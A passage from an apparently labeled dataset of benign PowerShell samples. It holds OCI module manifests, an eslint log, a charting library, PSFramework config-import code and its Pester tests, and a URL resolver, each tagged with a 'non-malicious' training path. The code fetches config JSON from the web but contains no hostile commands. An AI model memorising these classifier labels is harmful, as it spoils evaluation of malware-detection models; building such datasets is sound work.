GUID = '9e5d79e8-8286-48b7-ab80-a55d8a9440d3'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Secrets Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '82.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Secrets.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCISecretsSecretBundle', 'Get-OCISecretsSecretBundleByName',
'Get-OCISecretsSecretBundleVersionsList'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Secrets'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_62_63.ps1
|
sample_62_63.ps1
|
#
# Module manifest for module 'OCI.PSModules.Licensemanager'
#
# Generated by: Oracle Cloud Infrastructure
#
#
@{
# Script module or binary module file associated with this manifest.
RootModule = 'assemblies/OCI.PSModules.Licensemanager.dll'
# Version number of this module.
ModuleVersion = '86.0.0'
# Supported PSEditions
CompatiblePSEditions = 'Core'
# ID used to uniquely identify this module
GUID = 'd5ea5795-15c4-465d-b62e-2951d092514b'
# Author of this module
Author = 'Oracle Cloud Infrastructure'
# Company or vendor of this module
CompanyName = 'Oracle Corporation'
# Copyright statement for this module
Copyright = '(c) Oracle Cloud Infrastructure. All rights reserved.'
# Description of the functionality provided by this module
Description = 'This modules provides Cmdlets for OCI Licensemanager Service'
# Minimum version of the PowerShell engine required by this module
PowerShellVersion = '6.0'
# Name of the PowerShell host required by this module
# PowerShellHostName = ''
# Minimum version of the PowerShell host required by this module
# PowerShellHostVersion = ''
# Minimum version of Microsoft .NET Framework required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# DotNetFrameworkVersion = ''
# Minimum version of the common language runtime (CLR) required by this module. This prerequisite is valid for the PowerShell Desktop edition only.
# ClrVersion = ''
# Processor architecture (None, X86, Amd64) required by this module
# ProcessorArchitecture = ''
# Modules that must be imported into the global environment prior to importing this module
RequiredModules = @(@{ModuleName = 'OCI.PSModules.Common'; GUID = 'b3061a0d-375b-4099-ae76-f92fb3cdcdae'; RequiredVersion = '86.0.0'; })
# Assemblies that must be loaded prior to importing this module
RequiredAssemblies = 'assemblies/OCI.DotNetSDK.Licensemanager.dll'
# Script files (.ps1) that are run in the caller's environment prior to importing this module.
# ScriptsToProcess = @()
# Type files (.ps1xml) to be loaded when importing this module
# TypesToProcess = @()
# Format files (.ps1xml) to be loaded when importing this module
# FormatsToProcess = @()
# Modules to import as nested modules of the module specified in RootModule/ModuleToProcess
# NestedModules = @()
# Functions to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no functions to export.
FunctionsToExport = '*'
# Cmdlets to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no cmdlets to export.
CmdletsToExport = 'Get-OCILicensemanagerBulkUploadTemplate',
'Get-OCILicensemanagerConfiguration',
'Get-OCILicensemanagerLicenseMetric',
'Get-OCILicensemanagerLicenseRecord',
'Get-OCILicensemanagerLicenseRecordsList',
'Get-OCILicensemanagerProductLicense',
'Get-OCILicensemanagerProductLicenseConsumersList',
'Get-OCILicensemanagerProductLicensesList',
'Get-OCILicensemanagerTopUtilizedProductLicensesList',
'Get-OCILicensemanagerTopUtilizedResourcesList',
'Invoke-OCILicensemanagerBulkUploadLicenseRecords',
'New-OCILicensemanagerLicenseRecord',
'New-OCILicensemanagerProductLicense',
'Remove-OCILicensemanagerLicenseRecord',
'Remove-OCILicensemanagerProductLicense',
'Update-OCILicensemanagerConfiguration',
'Update-OCILicensemanagerLicenseRecord',
'Update-OCILicensemanagerProductLicense'
# Variables to export from this module
VariablesToExport = '*'
# Aliases to export from this module, for best performance, do not use wildcards and do not delete the entry, use an empty array if there are no aliases to export.
AliasesToExport = '*'
# DSC resources to export from this module
# DscResourcesToExport = @()
# List of all modules packaged with this module
# ModuleList = @()
# List of all files packaged with this module
# FileList = @()
# Private data to pass to the module specified in RootModule/ModuleToProcess. This may also contain a PSData hashtable with additional module metadata used by PowerShell.
PrivateData = @{
PSData = @{
# Tags applied to this module. These help with module discovery in online galleries.
Tags = 'PSEdition_Core','Windows','Linux','macOS','Oracle','OCI','Cloud','OracleCloudInfrastructure','Licensemanager'
# A URL to the license for this module.
LicenseUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/LICENSE.txt'
# A URL to the main website for this project.
ProjectUri = 'https://github.com/oracle/oci-powershell-modules/'
# A URL to an icon representing this module.
IconUri = 'https://github.com/oracle/oci-powershell-modules/blob/master/icon.png'
# ReleaseNotes of this module
ReleaseNotes = 'https://github.com/oracle/oci-powershell-modules/blob/master/CHANGELOG.md'
# Prerelease string of this module
# Prerelease = ''
# Flag to indicate whether the module requires explicit user acceptance for install/update/save
# RequireLicenseAcceptance = $false
# External dependent modules of this module
# ExternalModuleDependencies = @()
} # End of PSData hashtable
} # End of PrivateData hashtable
# HelpInfo URI of this module
# HelpInfoURI = ''
# Default prefix for commands exported from this module. Override the default prefix using Import-Module -Prefix.
# DefaultCommandPrefix = ''
}
|
combined_dataset/train/non-malicious/sample_44_58.ps1
|
sample_44_58.ps1
|
> lint
> eslint . --ext .ts
C:\Users\pfwobcke\.vscode\extensions\vscode-vdf\apps\extension\desktop\servers\HUDAnimations\src\server.ts
6:7 error 'server' is assigned a value but never used @typescript-eslint/no-unused-vars
C:\Users\pfwobcke\.vscode\extensions\vscode-vdf\apps\extension\desktop\servers\Popfile\src\server.ts
6:7 error 'server' is assigned a value but never used @typescript-eslint/no-unused-vars
C:\Users\pfwobcke\.vscode\extensions\vscode-vdf\apps\extension\desktop\servers\VDF\src\server.ts
6:7 error 'server' is assigned a value but never used @typescript-eslint/no-unused-vars
C:\Users\pfwobcke\.vscode\extensions\vscode-vdf\apps\extension\desktop\servers\VMT\src\server.ts
6:7 error 'server' is assigned a value but never used @typescript-eslint/no-unused-vars
✖ 4 problems (4 errors, 0 warnings)
npm ERR! Lifecycle script `lint` failed with error:
npm ERR! Error: command failed
npm ERR! in workspace: desktop-servers
npm ERR! at location: C:\Users\pfwobcke\.vscode\extensions\vscode-vdf\apps\extension\desktop\servers
|
combined_dataset/train/non-malicious/LibraryChart_1.ps1
|
LibraryChart_1.ps1
|
# ---------------------------------------------------------------------------
### <Script>
### <Author>
### Chad Miller
### </Author>
### <Description>
### Defines functions for wokring with Microsoft Chart Control for .NET 3.5 Framework
### Pipe output of Powershell command to Out-Chart function and specify chart type
### Chart will display in form or save to image file
### Real-time charts are supported by passing in a script block
### My thanks to Richard MacDonald for his wonderful post on Charting with PowerShell
### http://blogs.technet.com/richard_macdonald/archive/2009/04/28/3231887.aspx
### Note: Requires NET Framework 3.5 and Microsoft Chart Controls for Microsoft .NET Framework 3.5
### </Description>
### <Usage>
### . ./LibraryChart.ps1
### -------------------------- EXAMPLE 1 --------------------------
### Get-Process | Sort-Object -Property WS | Select-Object Name,WS -Last 5 | out-chart -xField 'name' -yField 'WS'
###
### This command will produce a default column chart
###
### -------------------------- EXAMPLE 2 --------------------------
### Get-Process | Sort-Object -Property WS | Select-Object Name,WS -Last 5 | out-chart -xField 'name' -yField 'WS' -filename 'c:\\users\\u00\\documents\\process.png'
### This command will output the chart to a file
###
### -------------------------- EXAMPLE 3 --------------------------
### Get-Process | Sort-Object -Property WS | Select-Object Name,WS -Last 5 | out-chart -xField 'name' -yField 'WS' -chartType 'Pie'
###
### This command will produce a pie chart
###
### -------------------------- EXAMPLE 4 --------------------------
### out-chart -xField 'name' -yField 'WS' -scriptBlock {Get-Process | Sort-Object -Property WS | Select-Object Name,WS -Last 1} -chartType 'line'
###
### This command will produce a real-time line chart
###
### </Usage>
### </Script>
# --------------------------------------------------------------------------
[void][Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms")
[void][Reflection.Assembly]::LoadWithPartialName("System.Windows.Forms.DataVisualization")
#######################
function New-Chart
{
param ([int]$width,[int]$height,[int]$left,[int]$top,$chartTitle)
# create chart object
$global:Chart = New-object System.Windows.Forms.DataVisualization.Charting.Chart
$global:Chart.Width = $width
$global:Chart.Height = $height
$global:Chart.Left = $left
$global:Chart.Top = $top
# create a chartarea to draw on and add to chart
$chartArea = New-Object System.Windows.Forms.DataVisualization.Charting.ChartArea
$global:chart.ChartAreas.Add($chartArea)
[void]$global:Chart.Titles.Add($chartTitle)
# change chart area colour
$global:Chart.BackColor = [System.Drawing.Color]::Transparent
} #New-Chart
#######################
function New-BarColumnChart
{
param ([hashtable]$ht, $chartType='Column', $chartTitle,$xTitle,$yTitle, [int]$width,[int]$height,[int]$left,[int]$top,[bool]$asc)
New-Chart -width $width -height $height -left $left -top $top -chartTile $chartTitle
$chart.ChartAreas[0].AxisX.Title = $xTitle
$chart.ChartAreas[0].AxisY.Title = $yTitle
[void]$global:Chart.Series.Add("Data")
$global:Chart.Series["Data"].Points.DataBindXY($ht.Keys, $ht.Values)
$global:Chart.Series["Data"].ChartType = [System.Windows.Forms.DataVisualization.Charting.SeriesChartType]::$chartType
if ($asc)
{ $global:Chart.Series["Data"].Sort([System.Windows.Forms.DataVisualization.Charting.PointSortOrder]::Ascending, "Y") }
else
{ $global:Chart.Series["Data"].Sort([System.Windows.Forms.DataVisualization.Charting.PointSortOrder]::Descending, "Y") }
$global:Chart.Series["Data"]["DrawingStyle"] = "Cylinder"
$global:chart.Series["Data"].IsValueShownAsLabel = $true
$global:chart.Series["Data"]["LabelStyle"] = "Top"
} #New-BarColumnChart
#######################
function New-LineChart
{
param ([hashtable]$ht,$chartTitle, [int]$width,[int]$height,[int]$left,[int]$top)
New-Chart -width $width -height $height -left $left -top $top -chartTile $chartTitle
[void]$global:Chart.Series.Add("Data")
# $global:Chart.Series["Data"].Points.AddXY($(get-date), $($ht.Values))
$global:Chart.Series["Data"].Points.DataBindXY($ht.Keys,$ht.Values)
#$global:Chart.Series["Data"].XValueType = [System.Windows.Forms.DataVisualization.Charting.ChartValueType]::Time
#$global:Chart.chartAreas[0].AxisX.LabelStyle.Format = "hh:mm:ss"
#$global:Chart.chartAreas[0].AxisX.LabelStyle.Interval = 1
#$global:Chart.chartAreas[0].AxisX.LabelStyle.IntervalType = [System.Windows.Forms.DataVisualization.Charting.DateTimeIntervalType]::Seconds
$global:Chart.Series["Data"].ChartType = [System.Windows.Forms.DataVisualization.Charting.SeriesChartType]::Line
#$global:chart.Series["Data"].IsValueShownAsLabel = $false
} #New-LineChart
#######################
function New-PieChart
{
param ([hashtable]$ht,$chartTitle, [int]$width,[int]$height,[int]$left,[int]$top)
New-Chart -width $width -height $height -left $left -top $top -chartTile $chartTitle
[void]$global:Chart.Series.Add("Data")
$global:Chart.Series["Data"].Points.DataBindXY($ht.Keys, $ht.Values)
$global:Chart.Series["Data"].ChartType = [System.Windows.Forms.DataVisualization.Charting.SeriesChartType]::Pie
$global:Chart.Series["Data"]["PieLabelStyle"] = "Outside"
$global:Chart.Series["Data"]["PieLineColor"] = "Black"
#$global:chart.Series["Data"].IsValueShownAsLabel = $true
#$global:chart.series["Data"].Label = "#PERCENT{P1}"
#$legend = New-object System.Windows.Forms.DataVisualization.Charting.Legend
#$global:Chart.Legends.Add($legend)
#$Legend.Name = "Default"
} #New-PieChart
#######################
function Remove-Points
{
param($name='Data',[int]$maxPoints=200)
while ( $global:chart.Series["$name"].Points.Count > $maxPoints )
{ $global:chart.Series["$name"].Points.RemoveAT(0) }
} #Add-Series
#######################
function Out-Form
{
param($interval,$scriptBlock,$xField,$yField)
# display the chart on a form
$global:Chart.Anchor = [System.Windows.Forms.AnchorStyles]::Bottom -bor [System.Windows.Forms.AnchorStyles]::Right -bor
[System.Windows.Forms.AnchorStyles]::Top -bor [System.Windows.Forms.AnchorStyles]::Left
$Form = New-Object Windows.Forms.Form
$Form.Text = 'PowerCharts'
$Form.Width = 600
$Form.Height = 600
$Form.controls.add($global:Chart)
if ($scriptBlock -is [ScriptBlock])
{
if (!($xField -or $yField))
{ throw 'xField and yField required with scriptBlock parameter.' }
$timer = New-Object System.Windows.Forms.Timer
$timer.Interval = $interval
$timer.add_Tick({
$ht = &$scriptBlock | ConvertTo-HashTable $xField $yField
if ($global:Chart.Series["Data"].ChartTypeName -eq 'Line')
{
Remove-Points
$ht | foreach { $global:Chart.Series["Data"].Points.AddXY($($_.Keys), $($_.Values)) }
}
else
{ $global:Chart.Series["Data"].Points.DataBindXY($ht.Keys, $ht.Values) }
$global:chart.ResetAutoValues()
$global:chart.Invalidate()
})
$timer.Enabled = $true
$timer.Start()
}
$Form.Add_Shown({$Form.Activate()})
$Form.ShowDialog()
} #Out-Form
#######################
function Out-ImageFile
{
param($fileName,$fileformat)
$global:Chart.SaveImage($fileName,$fileformat)
}
#######################
### ConvertTo-Hashtable function based on code by Jeffery Snover
### http://blogs.msdn.com/powershell/archive/2008/11/23/poshboard-and-convertto-hashtable.aspx
#######################
function ConvertTo-Hashtable
{
param([string]$key, $value)
Begin
{
$hash = @{}
}
Process
{
$thisKey = $_.$Key
$hash.$thisKey = $_.$Value
}
End
{
Write-Output $hash
}
} #ConvertTo-Hashtable
#######################
function Out-Chart
{
param( $xField=$(throw 'Out-Chart:xField is required'),
$yField=$(throw 'Out-Chart:yField is required'),
$chartType='Column',$chartTitle,
[int]$width=500,
[int]$height=400,
[int]$left=40,
[int]$top=30,
$filename,
$fileformat='png',
[int]$interval=1000,
$scriptBlock,
[switch]$asc
)
Begin
{
$ht = @{}
}
Process
{
if ($_)
{
$thisKey = $_.$xField
$ht.$thisKey = $_.$yField
}
}
End
{
if ($scriptBlock)
{ $ht = &$scriptBlock | ConvertTo-HashTable $xField $yField }
switch ($chartType)
{
'Bar' {New-BarColumnChart -ht $ht -chartType $chartType -chartTitle $chartTitle -width $width -height $height -left $left -top $top -asc $($asc.IsPresent)}
'Column' {New-BarColumnChart -ht $ht -chartType $chartType -chartTitle $chartTitle -width $width -height $height -left $left -top $top -asc $($asc.IsPresent)}
'Pie' {New-PieChart -chartType -ht $ht -chartTitle $chartTitle -width $width -height $height -left $left -top $top }
'Line' {New-LineChart -chartType -ht $ht -chartTitle $chartTitle -width $width -height $height -left $left -top $top }
}
if ($filename)
{ Out-ImageFile $filename $fileformat }
elseif ($scriptBlock )
{ Out-Form $interval $scriptBlock $xField $yField }
else
{ Out-Form }
}
} #Out-Chart
|
combined_dataset/train/non-malicious/440.ps1
|
440.ps1
|
Register-PSFConfigSchema -Name Default -Schema {
param (
[string]
$Resource,
[System.Collections.Hashtable]
$Settings
)
$Peek = $Settings["Peek"]
$ExcludeFilter = $Settings["ExcludeFilter"]
$IncludeFilter = $Settings["IncludeFilter"]
$AllowDelete = $Settings["AllowDelete"]
$EnableException = $Settings["EnableException"]
Set-Location -Path $Settings["Path"]
$PassThru = $Settings["PassThru"]
function Read-PsfConfigFile
{
[CmdletBinding()]
param (
[Parameter(Mandatory = $true, ParameterSetName = 'Path')]
[string]
$Path,
[Parameter(Mandatory = $true, ParameterSetName = 'Weblink')]
[string]
$Weblink,
[Parameter(Mandatory = $true, ParameterSetName = 'RawJson')]
[string]
$RawJson
)
function New-ConfigItem
{
[Diagnostics.CodeAnalysis.SuppressMessageAttribute("PSUseShouldProcessForStateChangingFunctions", "")]
[CmdletBinding()]
param (
$FullName,
$Value,
$Type,
[switch]
$KeepPersisted,
[switch]
$Enforced,
[switch]
$Policy
)
[pscustomobject]@{
FullName = $FullName
Value = $Value
Type = $Type
KeepPersisted = $KeepPersisted
Enforced = $Enforced
Policy = $Policy
}
}
function Get-WebContent
{
[CmdletBinding()]
param (
[string]
$WebLink
)
$webClient = New-Object System.Net.WebClient
$webClient.Encoding = [System.Text.Encoding]::UTF8
$webClient.DownloadString($WebLink)
}
if ($Path)
{
if (-not (Test-Path $Path)) { return }
$data = Get-Content -Path $Path -Encoding UTF8 -Raw | ConvertFrom-Json -ErrorAction Stop
}
if ($Weblink)
{
$data = Get-WebContent -WebLink $Weblink | ConvertFrom-Json -ErrorAction Stop
}
if ($RawJson)
{
$data = $RawJson | ConvertFrom-Json -ErrorAction Stop
}
foreach ($item in $data)
{
if (-not $item.Version)
{
New-ConfigItem -FullName $item.FullName -Value ([PSFramework.Configuration.ConfigurationHost]::ConvertFromPersistedValue($item.Value, $item.Type))
}
if ($item.Version -eq 1)
{
if ((-not $item.Style) -or ($item.Style -eq "Simple")) { New-ConfigItem -FullName $item.FullName -Value $item.Data }
else
{
if (($item.Type -eq "Object") -or ($item.Type -eq 12))
{
New-ConfigItem -FullName $item.FullName -Value $item.Value -Type "Object" -KeepPersisted
}
else
{
New-ConfigItem -FullName $item.FullName -Value ([PSFramework.Configuration.ConfigurationHost]::ConvertFromPersistedValue($item.Value, $item.Type))
}
}
}
}
}
try
{
if ($Resource -like "http*") { $data = Read-PsfConfigFile -Weblink $Resource -ErrorAction Stop }
else
{
$pathItem = $null
try { $pathItem = Resolve-PSFPath -Path $Resource -SingleItem -Provider FileSystem }
catch { }
if ($pathItem) { $data = Read-PsfConfigFile -Path $pathItem -ErrorAction Stop }
else { $data = Read-PsfConfigFile -RawJson $Resource -ErrorAction Stop }
}
}
catch { Stop-PSFFunction -Message "Failed to import $Resource" -EnableException $EnableException -Tag 'fail', 'import' -ErrorRecord $_ -Continue -Target $Resource -Cmdlet $Settings["Cmdlet"] }
:element foreach ($element in $data)
{
foreach ($exclusion in $ExcludeFilter)
{
if ($element.FullName -like $exclusion)
{
continue element
}
}
if ($IncludeFilter)
{
$isIncluded = $false
foreach ($inclusion in $IncludeFilter)
{
if ($element.FullName -like $inclusion)
{
$isIncluded = $true
break
}
}
if (-not $isIncluded) { continue }
}
if ($Peek) { $element }
else
{
try
{
if (-not $element.KeepPersisted) { Set-PSFConfig -FullName $element.FullName -Value $element.Value -EnableException -AllowDelete:$AllowDelete -PassThru:$PassThru }
else { Set-PSFConfig -FullName $element.FullName -PersistedValue $element.Value -PersistedType $element.Type -AllowDelete:$AllowDelete -PassThru:$PassThru }
}
catch
{
Stop-PSFFunction -Message "Failed to set '$($element.FullName)'" -ErrorRecord $_ -EnableException $EnableException -Tag 'fail', 'import' -Continue -Target $Resource -Cmdlet $Settings["Cmdlet"]
}
}
}
}
|
combined_dataset/train/non-malicious/Get-HttpResponseUri.ps1
|
Get-HttpResponseUri.ps1
|
function Get-HttpResponseUri {
#.Synopsis
# Fetch the HEAD for a url and return the ResponseUri.
#.Description
# Does a HEAD request for a URL, and returns the ResponseUri. This is useful for resolving (in a service-independent way) shortened urls.
#.Parameter ShortUrl
# A (possibly) shortened URL to be resolved to its redirect location.
PARAM(
[Parameter(Position=0,Mandatory=$true,ValueFromPipeline=$true)]
[Alias("Uri","Url")]
[string]$ShortUrl
)
$req = [System.Net.HttpWebRequest]::Create($ShortUrl)
$req.Method = "HEAD"
$response = $req.GetResponse()
Write-Output $response.ResponseUri
$response.Close() # clean up like a good boy
}
|
combined_dataset/train/non-malicious/377.ps1
|
377.ps1
|
Describe "Import-PSFConfig Unit Tests" -Tag "CI", "Pipeline", "Unit" {
BeforeAll {
Get-PSFConfig -Module Import-PSFConfig -Force | ForEach-Object {
$null = [PSFramework.Configuration.ConfigurationHost]::Configurations.Remove($_.FullName)
}
Get-PSFConfig -FullName config.import.test | ForEach-Object {
$null = [PSFramework.Configuration.ConfigurationHost]::Configurations.Remove($_.FullName)
}
Get-PSFConfig -FullName MetaJson | ForEach-Object {
$null = [PSFramework.Configuration.ConfigurationHost]::Configurations.Remove($_.FullName)
}
}
AfterAll {
Get-PSFConfig -Module Import-PSFConfig -Force | ForEach-Object {
$null = [PSFramework.Configuration.ConfigurationHost]::Configurations.Remove($_.FullName)
}
Get-PSFConfig -FullName config.import.test | ForEach-Object {
$null = [PSFramework.Configuration.ConfigurationHost]::Configurations.Remove($_.FullName)
}
Get-PSFConfig -FullName MetaJson | ForEach-Object {
$null = [PSFramework.Configuration.ConfigurationHost]::Configurations.Remove($_.FullName)
}
}
It "Should have the designed for parameters & sets" {
(Get-Command Import-PSFConfig).ParameterSets.Name | Should -Be 'Path', 'ModuleName'
foreach ($key in (Get-Command Import-PSFConfig).Parameters.Keys)
{
$key | Should -BeIn 'Path', 'ModuleName', 'ModuleVersion', 'Scope', 'Schema', 'IncludeFilter', 'ExcludeFilter', 'Peek', 'AllowDelete', 'PassThru', 'EnableException', 'Verbose', 'Debug', 'ErrorAction', 'WarningAction', 'InformationAction', 'ErrorVariable', 'WarningVariable', 'InformationVariable', 'OutVariable', 'OutBuffer', 'PipelineVariable'
}
}
Describe "Integrity of imported data is verified" {
Set-Content -Path testdrive:\Import-PSFConfig.Phase1.Config1.json -Value @'
{
"FullName": "import-psfconfig.phase1.setting1",
"Type": 3,
"Version": 1,
"Value": "42",
"Style": "default"
}
'@
It "Should correctly import the configuration Json from file" {
Get-Content 'testdrive:\Import-PSFConfig.Phase1.Config1.json' | Select-String '"Version": 1' | Should -Not -BeNullOrEmpty
Import-PSFConfig -Path testdrive:\Import-PSFConfig.Phase1.Config1.json
Get-PSFConfigValue -FullName 'import-psfconfig.phase1.setting1' | Should -Be 42
(Get-PSFConfigValue -FullName 'import-psfconfig.phase1.setting1').GetType().FullName | Should -Be 'System.Int32'
}
Set-Content -Path testdrive:\Import-PSFConfig.Phase1.Config2.json -Value @'
{
"FullName": "import-psfconfig.phase1.setting2",
"Version": 1,
"Data": 23
}
'@
It "Should correctly import simple style configuration" {
Import-PSFConfig -Path testdrive:\Import-PSFConfig.Phase1.Config2.json
Get-PSFConfigValue -FullName 'import-psfconfig.phase1.setting2' | Should -Be 23
(Get-PSFConfigValue -FullName 'import-psfconfig.phase1.setting2').GetType().FullName | Should -Be 'System.Int32'
}
Set-Content -Path testdrive:\Import-PSFConfig.Phase1.Config3.json -Value @'
{
"FullName": "import-psfconfig.phase1.setting3",
"Type": 12,
"Version": 1,
"Value": "H4sIAAAAAAAEAK1Xa2/iOBT9vtL+B5SvC3mQ8BREKmG6iwYomtAZaaYjrUnc4h0njmxnWvbXrx0g71DQDv1A8T0+ufa599iZPOz+Ya3PkDJEwqliqIaqq4bSegtwyKbKnvNorGnM28MAMDVAHiWMPHPVI4EWkVcxbw8x1rq6bmm6pdi//9ZqTQRn6xN8XvhTRT8OicHtujImR233wDgM1MWDOkcUepzQwyJ8JhNtW4+6RxgefzXDVkDkBfDsIJ4okhGs9bhyTPy3TvMlLqcofLG/oNAnr0zEziMnxIaSiGWsbms9VdYggEo2xS2F72OMjxBn/NSI2gAKQ67YhchMRj68IcaZYnMaw4k2K837RAhPmKuUH944DKXGJdb5VkYdCgEXwS2SqXV1Y9DRR53uaGvoY6s3Ngx1MDCHA9P6Q++OdX2izbeXKB65V2DRh0WWr3UES8D4nedBxtIshh190DH6MgvdGutDtav3h9Zg1JxFkeScx5lH5FHgaczjC0Uc/s80Uo4bs0jkuuOi0nYxh0LrtC0y4SZavvYmq0oBuRvA94q9Svt1I3vVlb2qOoTCp6yLxuOLpegei/FGvjoiZ4+w39wf0jQS3Jyin1A5m4WRmUXBRArjxd4PwQsMRM7qXcxJkFSleqItW8ZlOyhZQtEWnIoh1JhCtn4npnIfl8RLEiq2Ydk/nPqg4P6JfEivE6Keo9YjsvAcMo+i6Jjig1sBrRGWsBV4Q0EcuOhfoZRWhJyEFIbgiwUjgFMtu0XNCnpWYtdomj2jLOr7wtaIWxT4lmdXC6GhGPKb+MggTfQu7WAeswGMvRLqVzFFDziPiZXWCjZHLMLgkKhfoKrS5O0k+f3Yt07p+optdM2ROdSH/ZHRnWgiVIu9p1CUsWHqo65umUbf6JexEy3vWoW8MytIC/5cJWaDG5g3usGJ9xfawXUdeYtjLIIIJ5kL/PYQwcauDwIQ+ix3MTovr77F/4I4kljl8h75GHckVBVXwUte9Z7hbFw3BNEivGBa9RNXxI8xPD7k+qlng0omV7yp6nH1z3ZABHYII47kCSyWyCFtt9w9ibEvdldeMNqtzAFYw06T001Pdjp7uqcI+hR5+wr6VPDJEcXSYrcu2GUlli9ch2AsKlesj52KWGwHxLnxv41v3649L8W6LyDb6cuDKd4cxJ/YlxjzmMJpCGNOAW63NvEOI+8jPGzJDyiAxu7ZHPb6wDf7FjR737//OvdeujVMYs+ya0Od2br2vKyJpC+Tle217J0lG5sdy3/BHBJygEJ5cNdf3KU8iu135Kd6dZoBBt+9N20BfYE8rZ1eg1H2mowyXzN/QpEr8tSleNnIVcrRutqtgHmEYrTLpLeulX43GICe1+sbI9OC+nBUlf42+xUK5fQs7f/JCpYo/JH4Z4pMz57zhOSb2f8BpzdzLA0PAAA=",
"Style": "Default"
}
'@
It "Should correctly defer deserialization until being explicitly requested" {
Import-PSFConfig -Path testdrive:\Import-PSFConfig.Phase1.Config3.json
(Get-PSFConfig -FullName 'Import-PSFConfig.Phase1.Setting3').SafeValue.Name | Should -BeNullOrEmpty
(Get-PSFConfig -FullName 'Import-PSFConfig.Phase1.Setting3').Value.Name | Should -Be 'Windows'
}
}
Describe "Import paths / methodologies are applied" {
It "Should correctly import configuration from a weblink" {
$webLink = 'https://raw.githubusercontent.com/PowershellFrameworkCollective/psframework/master/PSFramework/tests/testdata/configdata.json'
Get-PSFConfigValue -FullName 'config.import.test' | Should -BeNullOrEmpty
{ Import-PSFConfig -Path $webLink -ErrorAction Stop -EnableException } | Should -Not -Throw
Get-PSFConfigValue -FullName 'config.import.test' | Should -Be 42
}
It "Should correctly import raw json data for configuration" {
$json = @'
{
"FullName": "import-psfconfig.phase2.setting1",
"Type": 3,
"Version": 1,
"Value": "42",
"Style": "Default"
}
'@
{ $json | Import-PSFConfig } | Should -Not -Throw
Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting1' | Should -Be 42
}
It "Should allow peek at settings without importing them" {
$json = @'
{
"FullName": "import-psfconfig.phase2.setting2",
"Type": 3,
"Version": 1,
"Value": "42",
"Style": "Default"
}
'@
$data = $json | Import-PSFConfig -Peek
Get-PSFConfigValue -FullName 'import-psfconfig.phase2.setting2' | Should -BeNullOrEmpty
$data.FullName | Should -Be 'import-psfconfig.phase2.setting2'
$data.Value | Should -Be 42
$data.KeepPersisted | Should -Be $false
}
It "Should correctly filter out unwanted settings" {
$json1 = @'
[
{
"FullName": "import-psfconfig.phase2.setting3",
"Type": 3,
"Version": 1,
"Value": "3",
"Style": "Default"
},
{
"FullName": "import-psfconfig.phase2.setting4",
"Type": 3,
"Version": 1,
"Value": "4",
"Style": "Default"
},
{
"FullName": "import-psfconfig.phase2.setting8",
"Type": 3,
"Version": 1,
"Value": "8",
"Style": "Default"
}
]
'@
$json2 = @'
[
{
"FullName": "import-psfconfig.phase2.setting7",
"Type": 3,
"Version": 1,
"Value": "7",
"Style": "Default"
},
{
"FullName": "import-psfconfig.phase2.setting10",
"Type": 3,
"Version": 1,
"Value": "10",
"Style": "Default"
},
{
"FullName": "import-psfconfig.phase2.setting9",
"Type": 3,
"Version": 1,
"Value": "9",
"Style": "Default"
},
{
"FullName": "import-psfconfig.phase2.setting5",
"Type": 3,
"Version": 1,
"Value": "5",
"Style": "Default"
},
{
"FullName": "import-psfconfig.phase2.setting6",
"Type": 3,
"Version": 1,
"Value": "6",
